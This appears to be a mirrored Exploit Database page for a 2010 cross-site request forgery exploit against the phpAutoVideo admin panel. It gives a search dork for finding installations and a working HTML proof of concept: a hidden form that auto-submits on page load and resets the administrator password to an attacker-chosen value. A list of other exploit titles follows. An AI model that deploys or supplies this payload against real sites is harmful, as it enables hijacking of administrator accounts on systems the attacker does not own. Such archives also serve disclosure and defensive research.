phpAutoVideo – Cross-Site Request Forgery

Exploit Database
14 阅读

作者： GoLdeN-z3r0

日期： 2010-02-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11502/

##################################################################
#Exploit Title: phpAutoVideo csrf#
#SoftWare:https://secure.agaresmedia.com/v6/products/phpautovideo#
#Dork: Copyright Agares Media phpautovideo #
#Author: GoLdeN-z3r0 #
##################################################################
(-----------------------------------------------------------------)
 | PoC : |
(-----------------------------------------------------------------)
<html>
<body onload="document.registrationform.submit()">
<form action="http://[site]/admin/coreadmin.php" method="post" name="registrationform">
<input type="hidden" name="admintype" value="changepass">
<input type="hidden" name="passworda" value="z3r0">
<input type="hidden" name="passwordb" value="z3r0">
</form>
</body>
</html>

last Exploits
phpAutoVideo – Cross-Site Request Forgery的更多信息

SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x – Remote Command Execution：
PHPMyFAQ 2.6.x – ‘index.php’ Cross-Site Scripting：
VideoFlow Digital Video Protection (DVP) 2.10 – Hard-Coded Credentials：
Asbru Web Content Management System 9.2.7 – Multiple Vulnerabilities：
Joomla! Component com_software – SQL Injection：
textpattern CMS 4.2.0 – Remote File Inclusion：
WordPress Plugin WP Symposium 15.1 – ‘get_album_item.php’ SQL Injection：
ferretCMS 1.0.4-alpha – Multiple Vulnerabilities：